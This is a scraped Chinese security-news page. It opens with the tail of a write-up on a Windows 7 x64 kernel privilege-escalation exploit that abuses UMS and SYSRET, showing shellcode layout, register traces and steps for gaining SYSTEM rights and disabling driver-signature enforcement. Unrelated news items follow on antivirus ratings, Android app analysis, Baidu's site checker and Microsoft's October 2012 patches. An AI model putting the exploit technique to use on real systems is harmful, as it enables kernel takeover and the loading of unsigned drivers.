r9d</p><p>51.&nbsp;&nbsp;.text:FFFFF800028D12FA jmp loc_FFFFF800028D1190</p><p>而如果R11寄存器指向一個內核shellcode并且內核調用它,則我們的shellcode就能可靠運行了。</p><p>下面我結合代碼進行下簡單的說明。</p><p>上面說了一大通東西,其實關鍵就是</p><p>1,&nbsp;&nbsp;掛鉤特殊函數使其產生本無法產生的特殊非規范地址,并使指令跳到這個特殊非規范地址從而觸發系統異常。</p><p>2,&nbsp;&nbsp;系統發生異常時候,通過設置一些特定的數據跳轉,跳轉到我們想要的地方。也就是最關鍵的函數</p><p>nt!KiDeliverApc,大家看代碼的時候,需要結合標紅的字段就可以理解SHELLCODE的布局了。</p><p>觸發這個異常的時候,gs:188指向的是我們分配的0地址,所以</p><p>mov rbx, gs:188h&nbsp;&nbsp;rbx =0</p><p>lea rsi, [rbx+50h]&nbsp;&nbsp;rsi =0x50</p><p>mov r8, [rsi]&nbsp; &nbsp;r8 =0</p><p>lea r10, [r8-10h] r10 = -10h</p><p>mov r11, [r10+20h] r11 = 0x10</p><p>call r11&nbsp;&nbsp;call的是我們分配地址0+0x10的地方。</p><p>也就是代碼里</p><p>*(PLONGLONG)((ULONG_PTR)0L+0x10) =&nbsp;&nbsp;KernelShellcodeAddress;</p><p>的精華所在,其他的大家看代碼也就清楚了。</p><p>說明的是:</p><p><strong>原始的老外代碼是VS2010 編譯的,我修改為最常用的VS2008 編譯</strong>,同時修改了些小BUG。</p><p>代碼調試可以調試到</p><p>斷點nt!KiUmsFastReturnToUser</p><p>Breakpoint 5 hit</p><p>nt!KiUmsFastReturnToUser+0x17e:</p><p>fffff800`0428907e 488b8de8000000&nbsp;&nbsp;mov&nbsp; &nbsp;&nbsp;&nbsp;rcx,qword ptr [rbp+0E8h] //構造的異常返回地址</p><p>2: kd&gt; p</p><p>nt!KiUmsFastReturnToUser+0x185:</p><p>fffff800`04289085 4c8b9df8000000&nbsp;&nbsp;mov&nbsp; &nbsp;&nbsp;&nbsp;r11,qword ptr [rbp+0F8h]</p><p>2: kd&gt; p</p><p>nt!KiUmsFastReturnToUser+0x18c:</p><p>fffff800`0428908c 498be9&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; mov&nbsp; &nbsp;&nbsp;&nbsp;rbp,r9</p><p>2: kd&gt; r</p><p>rax=0000000000000000 rbx=fffffa800fa0fb60 rcx=8000000000000000(構造的異常返回地址)</p><p>rdx=0000000000000000 rsi=0000000076f8edc0 rdi=0000000000000000</p><p>rip=fffff8000428908c rsp=fffff880097d2bb0 rbp=fffff880097d2c60</p><p>r8=00000000002ff6e0&nbsp;&nbsp;r9=00000000002ff6e0 r10=0000000000000000</p><p>r11=0000000000010246 r12=0000000000000001 r13=0000000000000001</p><p>r14=0000000000000000 r15=00000000771e84f0</p><p>iopl=0&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;nv up di pl zr na po nc</p><p>cs=0010&nbsp;&nbsp;ss=0018&nbsp;&nbsp;ds=002b&nbsp;&nbsp;es=002b&nbsp;&nbsp;fs=0053&nbsp;&nbsp;gs=002b&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; efl=00000046</p><p>nt!KiUmsFastReturnToUser+0x18c:</p><p>fffff800`0428908c 498be9&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; mov&nbsp; &nbsp;&nbsp;&nbsp;rbp,r9</p><p>后面SYSRET 觸發異常后,不能對在異常處理的代碼下斷點,否則會觸發藍屏。</p><p>還有masm64New.rules文件拷貝到你的X:\Program Files\Microsoft Visual Studio 9.0\VC\VCProjectDefaults,X為你VC2008所在的盤。然后就可以調試即可。</p><p>代碼里面也比較簡單</p><p>1,&nbsp;&nbsp;不是WIN764 位就退出</p><p>2,&nbsp;&nbsp;UMS函數初始化失敗也退出。</p><p>3,&nbsp;&nbsp;判斷函數的參數,或者帶PID,或者是EXE路勁,為了能使對應的程序為SYSTEM權限,及清除標志g_CiEnabled,從而可以安裝加載非簽名驅動,這2個是為了表明內核執行代碼可能導致的危害性做的演示。</p><p>4,&nbsp;&nbsp;分配0地址,并填入一些特殊數據,確保執行流程按指定的方向執行。</p><p>5,&nbsp;&nbsp;設置好SHELLCODE,并將shellcode入口點填入地址0X10,從而使其被觸發調用</p><p>6,&nbsp;&nbsp;調用UMS線程,調用到我們的HOOK,填入非規范地址,從而觸發異常執行。</p><p><strong>最后補充下,這段代碼在WIN8 64位下應該是無效的,因為WIN8 64不允許分配0地址,也不允許內核執行應用空間的代碼。</strong></p> [安全產品]AV-C最新殺毒軟件評級:360檢測率中位列第一、誤報率也是居世界首位 http://www.pirinnaturalssoapandspa.com//html/17903_1.html 西西 安全產品 2012/11/1 15:29:48 <p>日前世界殺毒軟件評級機構AV-C(Anti Virus Compartive)公布了2012年7月最新版的殺毒軟件評測結果。<span style="color:#ff0000;">結果顯示,奇虎360軟件除了在檢測率中位列第一以外,其誤報率也居全世界之首。</span>據悉,誤報測試是考核殺毒軟件的一個重要指標,誤報引起的麻煩不亞于真正感染了病毒。</p><p>此次報告中指出,誤報率極低為0-3次,微軟與ESET位列其中;誤報率低為4-15次,G DATA,Panda,eSan等位列其中;誤報率高為15次以上,騰訊電腦管家,PC Tools等居于此位。而誤報率極高的為100次以上,此欄中只有奇虎一家公司上榜。</p><p><img alt="" src="https://pic.cr173.com/up/2012-11/2012110115300030489.jpg" /></p><p>報告最后公布了此次的殺毒軟件評級,級別分為三星(最佳),兩星(優秀)以及一星(標準)。其中騰訊電腦管家為兩星,奇虎360與今年3月版的評測結果一致,仍為一星。</p><p><img alt="" src="https://pic.cr173.com/up/2012-11/2012110115300029698.jpg" /></p><p>參與此次評級的殺毒軟件共包括全世界18個主流殺毒軟件,其中McAfee與趨勢科技等由于更多依賴云查殺而不在此次軟件評級范圍之內。</p> [安全產品]金山網絡針對安卓應用推出 “APK火眼分析系統” http://www.pirinnaturalssoapandspa.com//html/17882_1.html 西西 安全產品 2012/10/31 21:34:31 <p>&nbsp;針對Android系統安全缺陷、市場審核不嚴、APP應用良莠不齊、各種灰色利益產業鏈不斷催生等狀況,近日金山網絡全新推出 “&nbsp;APK火眼分析系統”。APK火眼分析系統是一套自動化的安卓應用動態行為分析系統??梢跃珳首R別任何一個手機應用網站、電子市場上下載的安卓應用。查看應用是否正常,是否含廣告或其他惡意行為。</p><p>在查看的同時APK火眼分析系統還能清晰描述該行為對用戶的影響,幫助用戶識別和判斷。<br /><br /><img alt="" src="https://pic.cr173.com/up/2012-10/2012103121343482734.png" /><br /><br />使用APK火眼分析系統請點擊<a href="http://fireeye.ijinshan.com">http://fireeye.ijinshan.com</a> </p> [安全產品]騷擾電話的克星、安全管家號碼標記設置 http://www.pirinnaturalssoapandspa.com//html/17746_1.html 佚名 安全產品 2012/10/25 16:13:25 <p>&nbsp;無論是假期、工作日,騷擾電話,短信無時無刻,充斥著我們的手機收件箱,“買房”“中獎”“保險”“教育”,這些即是生活中的一部分,也是手機騷擾者的首選。但是在緊張的工作生活中,我們真的無暇應付。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;由于記不住號碼,或者工作業務需要,被騷擾成為了尷尬的事情。對于從不說“no”的朋友想要掛斷騷擾電話,想必還要想出很多說辭,編造一些“謊言”。怎么能給垃圾短信放個長假呢?安全管家的騷擾攔截功能成為用戶的首選。</p><p>{insd m=&quot;0&quot; i=&quot;33687&quot;}&nbsp;<br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;下面,讓我們來全方位解讀一下安全管家新功能號碼標記:</p><p>&nbsp; &nbsp; &nbsp;&nbsp;<strong>&nbsp;號碼標記功能</strong>——解決對騷擾號碼的標記問題。陌生號碼來電時,如果選擇掛機,會提示“是否立即對陌生號碼進行標記”!點擊“是”進入設置界面。貼心的服務,且設置十分方便!</p><p>&nbsp;<img alt="" src="https://pic.cr173.com/up/2012-10/2012102516144542863.jpg" /></p><p><br />&nbsp; &nbsp; &nbsp; &nbsp;可以對標記的號碼進行查看,如果上次忘記設置還能通過右上角的“+”進行設置!<br /></p><p>&nbsp;<img alt="" src="https://pic.cr173.com/up/2012-10/2012102516141039535.jpg" /></p><p><br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;被標記過的號碼,再來電話之后,效果就很明顯了。這個功能不僅只對自己的功能,只要手機上安裝了安全管家的,同一個號碼來電的時候也會同樣的顯示!</p><p><img alt="" src="https://pic.cr173.com/up/2012-10/2012102516141095092.jpg" />&nbsp;</p><p><br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;同樣有這個困惑的用戶,也手動設置起來吧!主動設置號碼標記功能同時,其他用戶也能享受到這個功能的快捷!</p> [網絡安全]百度網站安全檢測工具升級上線、百度網站安全檢測網址 http://www.pirinnaturalssoapandspa.com//html/17705_1.html 百度 網絡安全 2012/10/24 14:55:29 <p>各位網站管理員: <br /><br />近期接到較多網站管理員反饋,當發現網站在百度搜索的結果里顯示被黑后(“百度提示您:該頁面可能因黑客侵入存在安全風險”),不知道具體哪里被黑,無法定位問題修復網站,非常著急無法快速修復問題,造成搜索流量和網站用戶體驗的雙重損失。故我們對網站安全檢測工具進行了升級,新升級的工具可以檢測出網站被黑的詳細類別,包括掛馬、釣魚、欺詐、違規內容,同時還有針對這些被黑的詳細修復建議,讓站長能夠在最快速的時間里解決網站安全問題。網站被黑嚴重影響了網站運營和用戶體驗,同樣也影響了搜索引擎的體驗,解決被黑問題刻不容緩,百度安全聯盟伙伴有千萬級別的惡意庫,保障百度搜索用戶的訪問安全。<br /><br />網站被黑會影響網站在百度網頁搜索中的體現<br /><br />當網站管理員發現網站在百度網頁搜索的結果里顯示有風險后,可初步判定為該網站被黑,通過本工具來查詢您的被黑的詳細類別以及修復建議,盡快幫您定位解決問題,當您解除被黑狀態,百度檢測網站正常后(需要一定的時間和系統流程),網頁搜索結果里的風險提示也會相應取消。如果網站頻繁被黑,或被黑后如黑客發布大量對用戶有損傷的內容,百度網頁搜索也會在一段時間內降低對該網站的體現,避免用戶受到黑客攻擊網站的負面影響。希望網站用好網站安全監測工具,盡快修復被黑狀態,保證網站的正常運營及用戶體驗。<br /><br />如何使用網站安全檢測工具<br /><br />第一步,注冊并登錄百度站長平臺<br /><br />第二步, 選擇左側“網站安全檢測工具”<br /><br />第三步, 輸入要檢測的網址,可查看網站是否存在安全風險<br /><br />第四步,如果站點存在安全風險且已在站長平臺驗證過站點(提交網站并驗證歸屬,具體驗證網站歸屬方法可見幫助文檔),可以點擊查看被黑詳情<br /><span style="font-size:18px;"><br />百度網站安全檢測網址:</span><a href="http://zhanzhang.baidu.com/safe"><span style="font-size:18px;">http://zhanzhang.baidu.com/safe</span></a></p><p><img src="https://pic.cr173.com/up/2012-10/2012101024241457439598.jpg" alt="" /><br /><br />(溫馨提示:只有驗證過站點才可以查看風險詳情,以及使用漏洞檢測工具查看漏洞詳情。)<br /><br />被黑類型說明<br /><br />1.掛馬<br /><br />掛馬指網站被黑客通過入侵手段拿到修改頁面的權限,在網頁的源代碼中插入網頁木馬(惡意代碼),用戶在訪問網頁時就會運行網頁木馬受到漏洞攻擊,從而自動下載并執行病毒木馬程序。<br /><br />網站被掛馬會導致訪問網站的用戶電腦感染病毒木馬,可能會遭受遠程控制、泄露文檔資料、賬戶密碼等信息,危害極大。網站在被其他人發現存在掛馬后,搜索引擎、殺毒軟件、瀏覽器等會進行攔截用戶訪問,直接導致網站不可訪問,流失大量用戶。<br /><br />2.釣魚<br /><br />釣魚是指頁面仿冒某知名網站,讓用戶以為是正規網站,給用戶造成損失。<br /><br />3.欺詐<br /><br />頁面中存在欺騙用戶、虛假的內容。<br /><br />4.違規內容<br /><br />內容存在違法信息,或者出于違法的灰色地帶。</p> [系統安全]微軟10月安全補丁、高危漏洞修復刻不容緩 http://www.pirinnaturalssoapandspa.com//html/17460_1.html 西西 系統安全 2012/10/11 9:27:03 <p>10月10日凌晨,微軟發布10月安全公告。本次微軟重點發布了Windows操作系統、Office套件、Server軟件、Sql Server等多個嚴重漏洞修復補丁。電腦管家團隊經過一夜奮戰,已經第一時間推送了微軟10月安全補丁,建議大家及時修復。</p><p>Windows操作系統是大多數網民必備的裝機軟件,其中編號為MS12-068的安全補丁可解決Microsoft Windows所有受支持版本(Windows 8和&nbsp;Windows Server 2012&nbsp;除外)中的一個秘密報告漏洞。如果攻擊者登錄系統并運行特制應用程序,則該漏洞可能允許提升特權。為此,電腦管家提醒廣大網民盡快修復此漏洞,杜絕存在的安全隱患。</p><p>除此之外,編號為MS12-064的安全補丁可解決&nbsp;Microsoft Office&nbsp;中兩個秘密報告漏洞。如果用戶打開或預覽特制的&nbsp;RTF文件,較嚴重的漏洞可能允許遠程執行代碼,成功利用此漏洞的攻擊者可以獲得與當前用戶相同的用戶權限。同理,MS12-065、MS12-066及MS12-067安全補丁主要修復office軟件中已知的其它可被黑客利用的漏洞,為避免電腦成為肉雞,建議廣大網民盡快修復。</p><p>{insd m=&quot;0&quot; i=&quot;11253&quot;}</p><p>電腦管家在此提醒廣大用戶,漏洞始終是病毒木馬入侵電腦的重要通道,及時安裝安全更新,可以大大降低電腦被惡意攻擊的可能性。電腦管家已向用戶推送了10月安全補丁,請大家及時修復。</p><p><strong>電腦管家漏洞修復提示如下:</strong></p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-10/2012101011110927341150.jpg" alt="" /></p><p><strong>&nbsp;電腦管家提示您,請及時修復本次漏洞,保證個人賬號、財產安全。</strong></p><p><strong>&nbsp;微軟官方信息如下:</strong></p><p><strong>Microsoft&nbsp;安全公告摘要&nbsp;(2012&nbsp;年&nbsp;10&nbsp;月)</strong></p><p><a href="http://technet.microsoft.com/zh-CN/security/bulletin/ms12-oct">http://technet.microsoft.com/zh-CN/security/bulletin/ms12-oct</a></p><table style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0px; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; WORD-SPACING: 0px; FONT: 14px/22px Tahoma; TEXT-TRANSFORM: none; BORDER-LEFT: windowtext 1pt solid; WIDTH: 836px; COLOR: rgb(0,0,0); TEXT-INDENT: 0px; PADDING-TOP: 0px; BORDER-BOTTOM: windowtext 1pt solid; WHITE-SPACE: normal; LETTER-SPACING: normal; BORDER-COLLAPSE: collapse; BACKGROUND-COLOR: rgb(255,255,255); orphans: 2; widows: 2; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px; border-spacing: 0px" cellspacing="0" cellpadding="0" width="99%" border="1"><thead style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>公告ID</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>公告標題和摘要</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%"><strong>最高嚴重等級和漏洞影響</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>重新啟動要求</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>受影響的軟件</strong></td></tr></thead><tbody style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-064</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Microsoft Word&nbsp;中的漏洞可能允許遠程執行代碼&nbsp;(2742319)</strong>&nbsp;<br /><br />此安全更新解決&nbsp;Microsoft Office&nbsp;中兩個秘密報告的漏洞。如果用戶打開或預覽特制的&nbsp;RTF文件,較嚴重的漏洞可能允許遠程執行代碼。成功利用此漏洞的攻擊者可以獲得與當前用戶相同的用戶權限。那些帳戶被配置為擁有較少系統用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">嚴重&nbsp;<br />遠程執行代碼</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft Server&nbsp;軟件</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-065</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Microsoft Works&nbsp;中的漏洞可能允許遠程執行代碼&nbsp;(2754670)</strong>&nbsp;<br /><br />此安全更新可解決&nbsp;Microsoft Works&nbsp;中一個秘密報告的漏洞。如果用戶使用&nbsp;Microsoft Works打開特制&nbsp;Microsoft Word&nbsp;文件,該漏洞可能允許遠程執行代碼。成功利用此漏洞的攻擊者可以獲得與當前用戶相同的用戶權限。那些帳戶被配置為擁有較少系統用戶權限的用戶比具有管理用戶權限的用戶受到的影響要小。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />遠程執行代碼</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-066</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>HTML&nbsp;清理組件中的漏洞可能允許特權提升&nbsp;(2741517)</strong>&nbsp;<br /><br />此安全更新可解決&nbsp;Microsoft Office、Microsoft Communications Platforms、Microsoft Server&nbsp;軟件和&nbsp;Microsoft Office Web Apps&nbsp;中一個公開披露的漏洞。如果攻擊者將特制內容發送給用戶,則該漏洞可能允許特權提升。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />特權提升</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft&nbsp;服務器軟件,&nbsp;<br />Microsoft Lync</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-067</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>FAST Search Server 2010 for SharePoint&nbsp;分析中的漏洞可能允許執行遠程代碼(2742321)</strong>&nbsp;<br /><br />此安全更新解決了&nbsp;Microsoft FAST Search Server 2010 for SharePoint&nbsp;中一個公開披露的漏洞。該漏洞可能允許使用受限制的令牌在用戶帳戶的安全上下文中遠程執行代碼。只有當啟用高級篩選包時,FAST Search Server for SharePoint&nbsp;才會受影響。默認情況下,高級篩選包已禁用。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />遠程執行代碼</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft Server&nbsp;軟件</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-068</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Windows&nbsp;內核中的漏洞可能允許特權提升&nbsp;(2724197)</strong><br /><br />此安全更新解決了&nbsp;Microsoft Windows&nbsp;所有受支持的版本(Windows 8&nbsp;和&nbsp;Windows Server 2012&nbsp;除外)中一個秘密報告的漏洞。對于&nbsp;Windows XP、Windows Server 2003、Windows Vista、Windows Server 2008、Windows 7&nbsp;和&nbsp;Windows Server 2008 R2&nbsp;的所有受支持版本,此安全更新的等級為“重要”。&nbsp;<br /><br />如果攻擊者登錄系統并運行特制應用程序,則該漏洞可能允許提升特權。攻擊者必須擁有有效的登錄憑據并能本地登錄才能利用此漏洞。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />特權提升</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">需要重啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; 